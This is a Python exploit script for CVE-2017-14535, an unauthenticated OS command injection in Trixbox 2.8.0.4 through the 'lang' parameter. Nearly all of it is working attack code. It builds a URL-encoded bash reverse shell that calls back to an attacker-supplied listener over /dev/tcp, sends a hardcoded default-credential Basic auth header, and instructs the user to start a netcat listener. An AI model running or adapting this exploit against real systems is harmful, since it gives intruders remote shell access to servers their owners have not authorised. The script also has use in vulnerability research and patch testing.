Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)

# Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)
# Date: 27.05.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
# Credits to: Sachin Wagh
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
# Version: 2.8.0.4
# Tested on: Xubuntu 20.04
# CVE: CVE-2017-14535

'''
Description:
trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php
'''



'''
Import required modules:
'''
import requests
import sys
import time


'''
User-input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
listen_ip = sys.argv[3]
listen_port = sys.argv[4]


'''
Construct malicious request:
'''
# Construct header:
header = {
    'Host': target_ip,
    'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'Cache-Control': 'max-age=0'
}

# Construct malicious link:
link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20'
link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x'
link = link_p1 + link_p2


'''
Finish: EXPLOIT!!!
'''
print('')
print('')
print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port)
print('')
time.sleep(2)
Ready = input("If you're done and want to start the exploit please input EXPLOIT: ")
if Ready == 'EXPLOIT':
    print('')
    print('Exploit sent, check your Netcat instance :)')
    x = requests.post(link, headers=header)
else:
    print('TRY AGAIN')